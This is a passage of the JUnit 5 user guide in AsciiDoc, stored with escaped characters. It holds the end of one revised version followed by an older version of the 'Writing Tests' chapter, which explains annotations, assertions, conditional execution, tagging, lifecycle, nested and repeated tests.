Synchronization\n\nIn addition to controlling the execution mode using the `{Execution}` annotation, JUnit\nJupiter provides another annotation-based declarative synchronization mechanism. The\n`{ResourceLock}` annotation allows you to declare that a test class or method uses a\nspecific shared resource that requires synchronized access to ensure reliable test\nexecution. The shared resource is identified by a unique name which is a `String`. The\nname can be user-defined or one of the predefined constants in `{Resources}`:\n`SYSTEM_PROPERTIES`, `SYSTEM_OUT`, `SYSTEM_ERR`, `LOCALE`, or `TIME_ZONE`.\n\nIf the tests in the following example were run in parallel _without_ the use of\n{ResourceLock}, they would be _flaky_. Sometimes they would pass, and at other times they\nwould fail due to the inherent race condition of writing and then reading the same JVM\nSystem Property.\n\nWhen access to shared resources is declared using the {ResourceLock} annotation, the\nJUnit Jupiter engine uses this information to ensure that no conflicting tests are run in\nparallel.\n\nIn addition to the `String` that uniquely identifies the shared resource, you may specify\nan access mode. Two tests that require `READ` access to a shared resource may run in\nparallel with each other but not while any other test that requires `READ_WRITE` access\nto the same shared resource is running.\n\n[source,java]\n----\ninclude::{testDir}\/example\/SharedResourcesDemo.java[tags=user_guide]\n----\n\n\n[[writing-tests-built-in-extensions]]\n=== Built-in Extensions\n\nWhile the JUnit team encourages reusable extensions to be packaged and maintained in\nseparate libraries, the JUnit Jupiter API artifact includes a few user-facing extension\nimplementations that are considered so generally useful that users shouldn't have to add\nanother dependency.\n\n[[writing-tests-built-in-extensions-TempDirectory]]\n==== The TempDirectory Extension\n\nThe `TempDirectory` extension can be used to create and clean up a temporary directory\nfor an individual test or all tests in a test class. To use it, register the extension\nand add a parameter of type `java.nio.file.Path` annotated with `@TempDir` to your test\nmethod, lifecycle method, or test class constructor.\n\nFor example, the following test registers the extension for a single test method, creates\nand writes to a file in the temporary directory, and checks its content.\n\n[source,java,indent=0]\n.A test method that requires a temporary directory\n----\ninclude::{testDir}\/example\/TempDirectoryDemo.java[tags=user_guide]\n----\n\nIn addition to the default file system for the local operating system, the\n`TempDirectory` extension can also be used with any `FileSystem` implementation -- for\nexample, https:\/\/github.com\/google\/jimfs[Jimfs]. In order to use a custom file system,\nregister the extension _programmatically_ via `@RegisterExtension` and supply a provider\nof a custom parent directory of type `Path`. The following example uses the Jimfs\n`FileSystem` and passes a custom `tmp` parent directory to the\n`createInCustomDirectory()` static factory method.\n\n[source,java]\n.A test class that configures the TempDirectory extension to use a custom file system\n----\ninclude::{testDir}\/example\/TempDirectoryWithCustomFileSystemDemo.java[tags=user_guide]\n----\n","old_contents":"[[writing-tests]]\n== Writing Tests\n\n[source,java,indent=0]\n.A first test case\n----\ninclude::{testDir}\/example\/MyFirstJUnitJupiterTests.java[tags=user_guide]\n----\n\n[[writing-tests-annotations]]\n=== Annotations\n\nJUnit Jupiter supports the following annotations for configuring tests and extending the\nframework.\n\nAll core annotations are located in the `{api-package}` package in the `junit-jupiter-api`\nmodule.\n\n[cols=\"20,80\"]\n|===\n| Annotation | Description\n\n| `@Test` | Denotes that a method is a test method. Unlike JUnit 4's `@Test` annotation, this annotation does not declare any attributes, since test extensions in JUnit Jupiter operate based on their own dedicated annotations. Such methods are _inherited_ unless they are _overridden_.\n| `@ParameterizedTest` | Denotes that a method is a <<writing-tests-parameterized-tests, parameterized test>>. Such methods are _inherited_ unless they are _overridden_.\n| `@RepeatedTest` | Denotes that a method is a test template for a <<writing-tests-repeated-tests, repeated test>>. Such methods are _inherited_ unless they are _overridden_.\n| `@TestFactory` | Denotes that a method is a test factory for <<writing-tests-dynamic-tests, dynamic tests>>. Such methods are _inherited_ unless they are _overridden_.\n| `@TestTemplate` | Denotes that a method is a <<writing-tests-test-templates, template for test cases>> designed to be invoked multiple times depending on the number of invocation contexts returned by the registered <<extensions-test-templates, providers>>. Such methods are _inherited_ unless they are _overridden_.\n| `@TestMethodOrder` | Used to configure the <<writing-tests-test-execution-order, test method execution order>> for the annotated test class; similar to JUnit 4's `@FixMethodOrder`. Such annotations are _inherited_.\n| `@TestInstance` | Used to configure the <<writing-tests-test-instance-lifecycle, test instance lifecycle>> for the annotated test class. Such annotations are _inherited_.\n| `@DisplayName` | Declares a custom display name for the test class or test method. Such annotations are not _inherited_.\n| `@DisplayNameGeneration` | Declares a custom display name generator for the test class. Such annotations are _inherited_.\n| `@BeforeEach` | Denotes that the annotated method should be executed _before_ *each* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, or `@TestFactory` method in the current class; analogous to JUnit 4's `@Before`. Such methods are _inherited_ unless they are _overridden_.\n| `@AfterEach` | Denotes that the annotated method should be executed _after_ *each* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, or `@TestFactory` method in the current class; analogous to JUnit 4's `@After`. Such methods are _inherited_ unless they are _overridden_.\n| `@BeforeAll` | Denotes that the annotated method should be executed _before_ *all* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, and `@TestFactory` methods in the current class; analogous to JUnit 4's `@BeforeClass`. Such methods are _inherited_ (unless they are _hidden_ or _overridden_) and must be `static` (unless the \"per-class\" <<writing-tests-test-instance-lifecycle, test instance lifecycle>> is used).\n| `@AfterAll` | Denotes that the annotated method should be executed _after_ *all* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, and `@TestFactory` methods in the current class; analogous to JUnit 4's `@AfterClass`. Such methods are _inherited_ (unless they are _hidden_ or _overridden_) and must be `static` (unless the \"per-class\" <<writing-tests-test-instance-lifecycle, test instance lifecycle>> is used).\n| `@Nested` | Denotes that the annotated class is a nested, non-static test class. `@BeforeAll` and `@AfterAll` methods cannot be used directly in a `@Nested` test class unless the \"per-class\" <<writing-tests-test-instance-lifecycle, test instance lifecycle>> is used. Such annotations are not _inherited_.\n| `@Tag` | Used to declare _tags_ for filtering tests, either at the class or method level; analogous to test groups in TestNG or Categories in JUnit 4. Such annotations are _inherited_ at the class level but not at the method level.\n| `@Disabled` | Used to _disable_ a test class or test method; analogous to JUnit 4's `@Ignore`. Such annotations are not _inherited_.\n| `@ExtendWith` | Used to register custom <<extensions,extensions>>. Such annotations are _inherited_.\n|===\n\nMethods annotated with `@Test`, `@TestTemplate`, `@RepeatedTest`, `@BeforeAll`,\n`@AfterAll`, `@BeforeEach`, or `@AfterEach` annotations must not return a value.\n\nWARNING: Some annotations may currently be _experimental_. Consult the table in\n<<api-evolution-experimental-apis>> for details.\n\n[[writing-tests-meta-annotations]]\n==== Meta-Annotations and Composed Annotations\n\nJUnit Jupiter annotations can be used as _meta-annotations_. That means that you can\ndefine your own _composed annotation_ that will automatically _inherit_ the semantics of\nits meta-annotations.\n\nFor example, instead of copying and pasting `@Tag(\"fast\")` throughout your code base (see\n<<writing-tests-tagging-and-filtering>>), you can create a custom _composed annotation_\nnamed `@Fast` as follows. `@Fast` can then be used as a drop-in replacement for\n`@Tag(\"fast\")`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/Fast.java[tags=user_guide]\n----\n\n[[writing-tests-classes-and-methods]]\n=== Test Classes and Methods\n\nA _test method_ is any instance method that is directly or meta-annotated with `@Test`,\n`@RepeatedTest`, `@ParameterizedTest`, `@TestFactory`, or `@TestTemplate`. A _test class_\nis any top level or static member class that contains at least one test method.\n\n[source,java,indent=0]\n.A standard test class\n----\ninclude::{testDir}\/example\/StandardTests.java[tags=user_guide]\n----\n\nNOTE: Test classes and test methods are not required to be `public`, but they must _not_\nbe `private`.\n\n[[writing-tests-display-names]]\n=== Display Names\n\nTest classes and test methods can declare custom display names -- with spaces, special\ncharacters, and even emojis -- that will be displayed by test runners and test reporting.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisplayNameDemo.java[tags=user_guide]\n----\n\n[[writing-tests-display-name-generator]]\n==== Display Name Generators\n\nJUnit Jupiter supports custom display name generators that can be configured via the\n`@DisplayNameGeneration` annotation. Values provided via `@DisplayName` annotations\nalways take precedence over display names generated by a `DisplayNameGenerator`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisplayNameGeneratorDemo.java[tags=user_guide]\n----\n\n```\n+-- DisplayNameGeneratorDemo [OK]\n +-- A year is not supported [OK]\n | +-- A negative value for year is not supported by the leap year computation. [OK]\n | | +-- For example, year -1 is not supported. [OK]\n | | '-- For example, year -4 is not supported. [OK]\n | '-- if it is zero() [OK]\n '-- A year is a leap year... [OK]\n +-- A year is a leap year if it is divisible by 4 but not by 100. [OK]\n '-- A year is a leap year if it is one of the following years. [OK]\n +-- Year 2016 is a leap year. [OK]\n +-- Year 2020 is a leap year. [OK]\n '-- Year 2048 is a leap year. [OK]\n```\n\n[[writing-tests-assertions]]\n=== Assertions\n\nJUnit Jupiter comes with many of the assertion methods that JUnit 4 has and adds a few\nthat lend themselves well to being used with Java 8 lambdas. All JUnit Jupiter assertions\nare `static` methods in the `{Assertions}` class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/AssertionsDemo.java[tags=user_guide]\n----\n\nJUnit Jupiter also comes with a few assertion methods that lend themselves well to being\nused in https:\/\/kotlinlang.org\/[Kotlin]. All JUnit Jupiter Kotlin assertions are top-level\nfunctions in the `org.junit.jupiter.api` package.\n\n\/\/ TODO: Change to using kotlin language highlighting after switch to rouge syntax highlighter\n[source,groovy,indent=0]\n----\ninclude::{kotlinTestDir}\/example\/AssertionsKotlinDemo.kt[tags=user_guide]\n----\n\n[[writing-tests-assertions-third-party]]\n==== Third-party Assertion Libraries\n\nEven though the assertion facilities provided by JUnit Jupiter are sufficient for many\ntesting scenarios, there are times when more power and additional functionality such as\n_matchers_ are desired or required. In such cases, the JUnit team recommends the use of\nthird-party assertion libraries such as {AssertJ}, {Hamcrest}, {Truth}, etc. Developers\nare therefore free to use the assertion library of their choice.\n\nFor example, the combination of _matchers_ and a fluent API can be used to make\nassertions more descriptive and readable. However, JUnit Jupiter's `{Assertions}` class\ndoes not provide an\nhttp:\/\/junit.org\/junit4\/javadoc\/latest\/org\/junit\/Assert.html#assertThat[`assertThat()`]\nmethod like the one found in JUnit 4's `org.junit.Assert` class which accepts a Hamcrest\nhttp:\/\/junit.org\/junit4\/javadoc\/latest\/org\/hamcrest\/Matcher.html[`Matcher`]. Instead,\ndevelopers are encouraged to use the built-in support for matchers provided by third-party\nassertion libraries.\n\nThe following example demonstrates how to use the `assertThat()` support from Hamcrest in\na JUnit Jupiter test. As long as the Hamcrest library has been added to the classpath,\nyou can statically import methods such as `assertThat()`, `is()`, and `equalTo()` and\nthen use them in tests like in the `assertWithHamcrestMatcher()` method below.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/HamcrestAssertionDemo.java[tags=user_guide]\n----\n\nNaturally, legacy tests based on the JUnit 4 programming model can continue using\n`org.junit.Assert#assertThat`.\n\n[[writing-tests-assumptions]]\n=== Assumptions\n\nJUnit Jupiter comes with a subset of the assumption methods that JUnit 4 provides and\nadds a few that lend themselves well to being used with Java 8 lambda expressions and\nmethod references. All JUnit Jupiter assumptions are static methods in the\n`{Assumptions}` class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/AssumptionsDemo.java[tags=user_guide]\n----\n\nNOTE: As of JUnit Jupiter 5.4, it is also possible to use methods from JUnit 4's\n`org.junit.Assume` class for assumptions. Specifically, JUnit Jupiter supports JUnit 4's\n`AssumptionViolatedException` to signal that a test should be aborted instead of marked\nas a failure.\n\n[[writing-tests-disabling]]\n=== Disabling Tests\n\nEntire test classes or individual test methods may be _disabled_ via the `{Disabled}`\nannotation, via one of the annotations discussed in\n<<writing-tests-conditional-execution>>, or via a custom <<extensions-conditions,\n`ExecutionCondition`>>.\n\nHere's a `@Disabled` test class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisabledClassDemo.java[tags=user_guide]\n----\n\nAnd here's a test class that contains a `@Disabled` test method.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisabledTestsDemo.java[tags=user_guide]\n----\n\nNOTE: `@Disabled` may be declared without providing a _reason_; however, the JUnit team\nrecommends that developers provide a short explanation for why a test class or test\nmethod has been disabled. Consequently, the above examples both show the use of a reason\n-- for example, `@Disabled(\"Disabled until bug #42 has been resolved\")`. Some development\nteams even require the presence of issue tracking numbers in the _reason_ for automated\ntraceability, etc.\n\n[[writing-tests-conditional-execution]]\n=== Conditional Test Execution\n\nThe <<extensions-conditions, `ExecutionCondition`>> extension API in JUnit Jupiter allows\ndevelopers to either _enable_ or _disable_ a container or test based on certain\nconditions _programmatically_. The simplest example of such a condition is the built-in\n`{DisabledCondition}` which supports the `{Disabled}` annotation (see\n<<writing-tests-disabling>>). In addition to `@Disabled`, JUnit Jupiter also supports\nseveral other annotation-based conditions in the `org.junit.jupiter.api.condition`\npackage that allow developers to enable or disable containers and tests _declaratively_.\nSee the following sections for details.\n\n[TIP]\n.Composed Annotations\n====\nNote that any of the _conditional_ annotations listed in the following sections may also\nbe used as a meta-annotation in order to create a custom _composed annotation_. For\nexample, the `@TestOnMac` annotation in the\n<<writing-tests-conditional-execution-os-demo, @EnabledOnOs demo>> shows how you can\ncombine `@Test` and `@EnabledOnOs` in a single, reusable annotation.\n====\n\n[WARNING]\n====\nEach of the _conditional_ annotations listed in the following sections can only be\ndeclared once on a given test interface, test class, or test method. If a conditional\nannotation is directly present, indirectly present, or meta-present multiple times on a\ngiven element, only the first such annotation discovered by JUnit will be used; any\nadditional declarations will be silently ignored. Note, however, that each conditional\nannotation may be used in conjunction with other conditional annotations in the\n`org.junit.jupiter.api.condition` package.\n====\n\n[[writing-tests-conditional-execution-os]]\n==== Operating System Conditions\n\nA container or test may be enabled or disabled on a particular operating system via the\n`{EnabledOnOs}` and `{DisabledOnOs}` annotations.\n\n[[writing-tests-conditional-execution-os-demo]]\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_os]\n----\n\n[[writing-tests-conditional-execution-jre]]\n==== Java Runtime Environment Conditions\n\nA container or test may be enabled or disabled on a particular version of the Java\nRuntime Environment (JRE) via the `{EnabledOnJre}` and `{DisabledOnJre}` annotations.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_jre]\n----\n\n[[writing-tests-conditional-execution-system-properties]]\n==== System Property Conditions\n\nA container or test may be enabled or disabled based on the value of the `named` JVM\nsystem property via the `{EnabledIfSystemProperty}` and `{DisabledIfSystemProperty}`\nannotations. The value supplied via the `matches` attribute will be interpreted as a\nregular expression.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_system_property]\n----\n\n[[writing-tests-conditional-execution-environment-variables]]\n==== Environment Variable Conditions\n\nA container or test may be enabled or disabled based on the value of the `named`\nenvironment variable from the underlying operating system via the\n`{EnabledIfEnvironmentVariable}` and `{DisabledIfEnvironmentVariable}` annotations. The\nvalue supplied via the `matches` attribute will be interpreted as a regular expression.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_environment_variable]\n----\n\n[[writing-tests-conditional-execution-scripts]]\n==== Script-based Conditions\n\nJUnit Jupiter provides the ability to either _enable_ or _disable_ a container or test\ndepending on the evaluation of a script configured via the `{EnabledIf}` or\n`{DisabledIf}` annotation. Scripts can be written in JavaScript, Groovy, or any other\nscripting language for which there is support for the Java Scripting API, defined by JSR\n223.\n\nWARNING: Conditional test execution via `{EnabledIf}` and `{DisabledIf}` is currently an\n_experimental_ feature. Consult the table in <<api-evolution-experimental-apis>> for\ndetails.\n\nTIP: If the logic of your script depends only on the current operating system, the\ncurrent Java Runtime Environment version, a particular JVM system property, or a\nparticular environment variable, you should consider using one of the built-in\nannotations dedicated to that purpose. See the previous sections of this chapter for\nfurther details.\n\nNOTE: If you find yourself using the same script-based condition many times, consider\nwriting a dedicated <<extensions-conditions, ExecutionCondition>> extension in order to\nimplement the condition in a faster, type-safe, and more maintainable manner.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_scripts]\n----\n\n[[writing-tests-conditional-execution-scripts-bindings]]\n===== Script Bindings\n\nThe following names are bound to each script context and therefore usable within the\nscript. An _accessor_ provides access to a map-like structure via a simple `String\nget(String name)` method.\n\n[cols=\"25,25,75\"]\n|===\n| Name | Type | Description\n\n| `systemEnvironment` | _accessor_ | Operating system environment variable accessor.\n| `systemProperty` | _accessor_ | JVM system property accessor.\n| `junitConfigurationParameter` | _accessor_ | Configuration parameter accessor.\n| `junitDisplayName` | `String` | Display name of the test or container.\n| `junitTags` | `Set<String>` | All tags assigned to the test or container.\n| `junitUniqueId` | `String` | Unique ID of the test or container.\n|===\n\n\n[[writing-tests-tagging-and-filtering]]\n=== Tagging and Filtering\n\nTest classes and methods can be tagged via the `@Tag` annotation. Those tags can later be\nused to filter <<running-tests,test discovery and execution>>.\n\n==== Syntax Rules for Tags\n\n* A tag must not be `null` or _blank_.\n* A _trimmed_ tag must not contain whitespace.\n* A _trimmed_ tag must not contain ISO control characters.\n* A _trimmed_ tag must not contain any of the following _reserved characters_.\n - `,`: _comma_\n - `(`: _left parenthesis_\n - `)`: _right parenthesis_\n - `&`: _ampersand_\n - `|`: _vertical bar_\n - `!`: _exclamation point_\n\nNOTE: In the above context, \"trimmed\" means that leading and trailing whitespace\ncharacters have been removed.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TaggingDemo.java[tags=user_guide]\n----\n\n[[writing-tests-test-execution-order]]\n=== Test Execution Order\n\nBy default, test methods will be ordered using a default algorithm that is deterministic\nbut intentionally nonobvious. This ensures that subsequent runs of a test suite execute\ntest methods in the same order, thereby allowing for repeatable builds.\n\nNOTE: In this context, a _test method_ is any instance method that is directly or\nmeta-annotated with `@Test`, `@RepeatedTest`, `@ParameterizedTest`, `@TestFactory`, or\n`@TestTemplate`.\n\nAlthough true _unit tests_ typically should not rely on the order in which they are\nexecuted, there are times when it is necessary to enforce a specific test method\nexecution order -- for example, when writing _integration tests_ or _functional tests_\nwhere the sequence of the tests is important, especially in conjunction\n`@TestInstance(Lifecycle.PER_CLASS)`.\n\nTo control the order in which test methods are executed, annotate your test class or test\ninterface with `{TestMethodOrder}` and specify the desired `{MethodOrderer}`\nimplementation. You can implement your own custom `MethodOrderer` or use one of the\nfollowing built-in `MethodOrderer` implementations.\n\n* `{Alphanumeric}`: sorts test methods _alphanumerically_ based on their names and formal\n parameter lists.\n* `{OrderAnnotation}`: sorts test methods _numerically_ based on values specified via the\n `{Order}` annotation.\n* `{Random}`: orders test methods _pseudo-randomly_ and supports configuration of a\n custom _seed_.\n\nThe following example demonstrates how to guarantee that test methods are executed in the\norder specified via the `@Order` annotation.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/OrderedTestsDemo.java[tags=user_guide]\n----\n\n[[writing-tests-test-instance-lifecycle]]\n=== Test Instance Lifecycle\n\nIn order to allow individual test methods to be executed in isolation and to avoid\nunexpected side effects due to mutable test instance state, JUnit creates a new instance\nof each test class before executing each _test method_ (see\n<<writing-tests-classes-and-methods>>). This \"per-method\" test instance lifecycle is the\ndefault behavior in JUnit Jupiter and is analogous to all previous versions of JUnit.\n\nNOTE: Please note that the test class will still be instantiated if a given _test method_\nis _disabled_ via a <<writing-tests-conditional-execution,condition>> (e.g., `@Disabled`,\n`@DisabledOnOs`, etc.) even when the \"per-method\" test instance lifecycle mode is active.\n\nIf you would prefer that JUnit Jupiter execute all test methods on the same test\ninstance, annotate your test class with `@TestInstance(Lifecycle.PER_CLASS)`. When using\nthis mode, a new test instance will be created once per test class. Thus, if your test\nmethods rely on state stored in instance variables, you may need to reset that state in\n`@BeforeEach` or `@AfterEach` methods.\n\nThe \"per-class\" mode has some additional benefits over the default \"per-method\" mode.\nSpecifically, with the \"per-class\" mode it becomes possible to declare `@BeforeAll` and\n`@AfterAll` on non-static methods as well as on interface `default` methods. The\n\"per-class\" mode therefore also makes it possible to use `@BeforeAll` and `@AfterAll`\nmethods in `@Nested` test classes.\n\nIf you are authoring tests using the Kotlin programming language, you may also find it\neasier to implement `@BeforeAll` and `@AfterAll` methods by switching to the \"per-class\"\ntest instance lifecycle mode.\n\n[[writing-tests-test-instance-lifecycle-changing-default]]\n==== Changing the Default Test Instance Lifecycle\n\nIf a test class or test interface is not annotated with `@TestInstance`, JUnit Jupiter\nwill use a _default_ lifecycle mode. The standard _default_ mode is `PER_METHOD`;\nhowever, it is possible to change the _default_ for the execution of an entire test plan.\nTo change the default test instance lifecycle mode, set the\n`junit.jupiter.testinstance.lifecycle.default` _configuration parameter_ to the name of\nan enum constant defined in `TestInstance.Lifecycle`, ignoring case. This can be supplied\nas a JVM system property, as a _configuration parameter_ in the\n`LauncherDiscoveryRequest` that is passed to the `Launcher`, or via the JUnit Platform\nconfiguration file (see <<running-tests-config-params>> for details).\n\nFor example, to set the default test instance lifecycle mode to `Lifecycle.PER_CLASS`,\nyou can start your JVM with the following system property.\n\n`-Djunit.jupiter.testinstance.lifecycle.default=per_class`\n\nNote, however, that setting the default test instance lifecycle mode via the JUnit\nPlatform configuration file is a more robust solution since the configuration file can be\nchecked into a version control system along with your project and can therefore be used\nwithin IDEs and your build software.\n\nTo set the default test instance lifecycle mode to `Lifecycle.PER_CLASS` via the JUnit\nPlatform configuration file, create a file named `junit-platform.properties` in the root\nof the class path (e.g., `src\/test\/resources`) with the following content.\n\n`junit.jupiter.testinstance.lifecycle.default = per_class`\n\nWARNING: Changing the _default_ test instance lifecycle mode can lead to unpredictable\nresults and fragile builds if not applied consistently. For example, if the build\nconfigures \"per-class\" semantics as the default but tests in the IDE are executed using\n\"per-method\" semantics, that can make it difficult to debug errors that occur on the\nbuild server. It is therefore recommended to change the default in the JUnit Platform\nconfiguration file instead of via a JVM system property.\n\n[[writing-tests-nested]]\n=== Nested Tests\n\nNested tests give the test writer more capabilities to express the relationship among\nseveral group of tests. Here's an elaborate example.\n\n[source,java,indent=0]\n.Nested test suite for testing a stack\n----\ninclude::{testDir}\/example\/TestingAStackDemo.java[tags=user_guide]\n----\n\nNOTE: _Only non-static nested classes_ (i.e. _inner classes_) can serve as `@Nested` test\nclasses. Nesting can be arbitrarily deep, and those inner classes are considered to be\nfull members of the test class family with one exception: `@BeforeAll` and `@AfterAll`\nmethods do not work _by default_. The reason is that Java does not allow `static` members\nin inner classes. However, this restriction can be circumvented by annotating a `@Nested`\ntest class with `@TestInstance(Lifecycle.PER_CLASS)` (see\n<<writing-tests-test-instance-lifecycle>>).\n\n[[writing-tests-dependency-injection]]\n=== Dependency Injection for Constructors and Methods\n\nIn all prior JUnit versions, test constructors or methods were not allowed to have\nparameters (at least not with the standard `Runner` implementations). As one of the major\nchanges in JUnit Jupiter, both test constructors and methods are now permitted to have\nparameters. This allows for greater flexibility and enables _Dependency Injection_ for\nconstructors and methods.\n\n`{ParameterResolver}` defines the API for test extensions that wish to _dynamically_\nresolve parameters at runtime. If a test constructor or a `@Test`, `@TestFactory`,\n`@BeforeEach`, `@AfterEach`, `@BeforeAll`, or `@AfterAll` method accepts a parameter, the\nparameter must be resolved at runtime by a registered `ParameterResolver`.\n\nThere are currently three built-in resolvers that are registered automatically.\n\n* `{TestInfoParameterResolver}`: if a method parameter is of type `{TestInfo}`, the\n `TestInfoParameterResolver` will supply an instance of `TestInfo` corresponding to the\n current test as the value for the parameter. The `TestInfo` can then be used to retrieve\n information about the current test such as the test's display name, the test class, the\n test method, or associated tags. The display name is either a technical name, such as\n the name of the test class or test method, or a custom name configured via `@DisplayName`.\n+\n`{TestInfo}` acts as a drop-in replacement for the `TestName` rule from JUnit 4. The\nfollowing demonstrates how to have `TestInfo` injected into a test constructor,\n`@BeforeEach` method, and `@Test` method.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TestInfoDemo.java[tags=user_guide]\n----\n\n* `{RepetitionInfoParameterResolver}`: if a method parameter in a `@RepeatedTest`,\n `@BeforeEach`, or `@AfterEach` method is of type `{RepetitionInfo}`, the\n `RepetitionInfoParameterResolver` will supply an instance of `RepetitionInfo`.\n `RepetitionInfo` can then be used to retrieve information about the current repetition\n and the total number of repetitions for the corresponding `@RepeatedTest`. Note,\n however, that `RepetitionInfoParameterResolver` is not registered outside the context\n of a `@RepeatedTest`. See <<writing-tests-repeated-tests-examples>>.\n\n* `{TestReporterParameterResolver}`: if a method parameter is of type `{TestReporter}`,\n the `TestReporterParameterResolver` will supply an instance of `TestReporter`. The\n `TestReporter` can be used to publish additional data about the current test run. The\n data can be consumed through `{TestExecutionListener}.reportingEntryPublished()` and\n thus be viewed by IDEs or included in reports.\n+\nIn JUnit Jupiter you should use `TestReporter` where you used to print information to\n`stdout` or `stderr` in JUnit 4. Using `@RunWith(JUnitPlatform.class)` will even output\nall reported entries to `stdout`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TestReporterDemo.java[tags=user_guide]\n----\n\nNOTE: Other parameter resolvers must be explicitly enabled by registering appropriate\n<<extensions,extensions>> via `@ExtendWith`.\n\nCheck out the `{RandomParametersExtension}` for an example of a custom\n`{ParameterResolver}`. While not intended to be production-ready, it demonstrates the\nsimplicity and expressiveness of both the extension model and the parameter resolution\nprocess. `MyRandomParametersTest` demonstrates how to inject random values into `@Test`\nmethods.\n\n[source,java,indent=0]\n----\n@ExtendWith(RandomParametersExtension.class)\nclass MyRandomParametersTest {\n\n\t@Test\n\tvoid injectsInteger(@Random int i, @Random int j) {\n\t\tassertNotEquals(i, j);\n\t}\n\n\t@Test\n\tvoid injectsDouble(@Random double d) {\n\t\tassertEquals(0.0, d, 1.0);\n\t}\n\n}\n----\n\nFor real-world use cases, check out the source code for the `{MockitoExtension}` and the\n`{SpringExtension}`.\n\n[[writing-tests-test-interfaces-and-default-methods]]\n=== Test Interfaces and Default Methods\n\nJUnit Jupiter allows `@Test`, `@RepeatedTest`, `@ParameterizedTest`, `@TestFactory`,\n`@TestTemplate`, `@BeforeEach`, and `@AfterEach` to be declared on interface `default`\nmethods. `@BeforeAll` and `@AfterAll` can either be declared on `static` methods in a\ntest interface or on interface `default` methods _if_ the test interface or test class is\nannotated with `@TestInstance(Lifecycle.PER_CLASS)` (see\n<<writing-tests-test-instance-lifecycle>>). Here are some examples.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestLifecycleLogger.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestInterfaceDynamicTestsDemo.java[tags=user_guide]\n----\n\n`@ExtendWith` and `@Tag` can be declared on a test interface so that classes that\nimplement the interface automatically inherit its tags and extensions. See\n<<extensions-lifecycle-callbacks-before-after-execution>> for the source code of the\n<<extensions-lifecycle-callbacks-timing-extension, TimingExtension>>.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TimeExecutionLogger.java[tags=user_guide]\n----\n\nIn your test class you can then implement these test interfaces to have them applied.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestInterfaceDemo.java[tags=user_guide]\n----\n\nRunning the `TestInterfaceDemo` results in output similar to the following:\n\n....\nINFO example.TestLifecycleLogger - Before all tests\nINFO example.TestLifecycleLogger - About to execute [dynamicTestsForPalindromes()]\nINFO example.TimingExtension - Method [dynamicTestsForPalindromes] took 19 ms.\nINFO example.TestLifecycleLogger - Finished executing [dynamicTestsForPalindromes()]\nINFO example.TestLifecycleLogger - About to execute [isEqualValue()]\nINFO example.TimingExtension - Method [isEqualValue] took 1 ms.\nINFO example.TestLifecycleLogger - Finished executing [isEqualValue()]\nINFO example.TestLifecycleLogger - After all tests\n....\n\nAnother possible application of this feature is to write tests for interface contracts.\nFor example, you can write tests for how implementations of `Object.equals` or\n`Comparable.compareTo` should behave as follows.\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/Testable.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/EqualsContract.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/ComparableContract.java[tags=user_guide]\n----\n\nIn your test class you can then implement both contract interfaces thereby inheriting the\ncorresponding tests. Of course you'll have to implement the abstract methods.\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/StringTests.java[tags=user_guide]\n----\n\nNOTE: The above tests are merely meant as examples and therefore not complete.\n\n\n[[writing-tests-repeated-tests]]\n=== Repeated Tests\n\nJUnit Jupiter provides the ability to repeat a test a specified number of times by\nannotating a method with `@RepeatedTest` and specifying the total number of repetitions\ndesired. Each invocation of a repeated test behaves like the execution of a regular\n`@Test` method with full support for the same lifecycle callbacks and extensions.\n\nThe following example demonstrates how to declare a test named `repeatedTest()` that\nwill be automatically repeated 10 times.\n\n[source,java]\n----\n@RepeatedTest(10)\nvoid repeatedTest() {\n\t\/\/ ...\n}\n----\n\nIn addition to specifying the number of repetitions, a custom display name can be\nconfigured for each repetition via the `name` attribute of the `@RepeatedTest`\nannotation. Furthermore, the display name can be a pattern composed of a combination of\nstatic text and dynamic placeholders. The following placeholders are currently supported.\n\n- `{displayName}`: display name of the `@RepeatedTest` method\n- `{currentRepetition}`: the current repetition count\n- `{totalRepetitions}`: the total number of repetitions\n\nThe default display name for a given repetition is generated based on the following\npattern: `\"repetition {currentRepetition} of {totalRepetitions}\"`. Thus, the display\nnames for individual repetitions of the previous `repeatedTest()` example would be:\n`repetition 1 of 10`, `repetition 2 of 10`, etc. If you would like the display name of\nthe `@RepeatedTest` method included in the name of each repetition, you can define your\nown custom pattern or use the predefined `RepeatedTest.LONG_DISPLAY_NAME` pattern. The\nlatter is equal to `\"{displayName} :: repetition {currentRepetition} of\n{totalRepetitions}\"` which results in display names for individual repetitions like\n`repeatedTest() :: repetition 1 of 10`, `repeatedTest() :: repetition 2 of 10`, etc.\n\nIn order to retrieve information about the 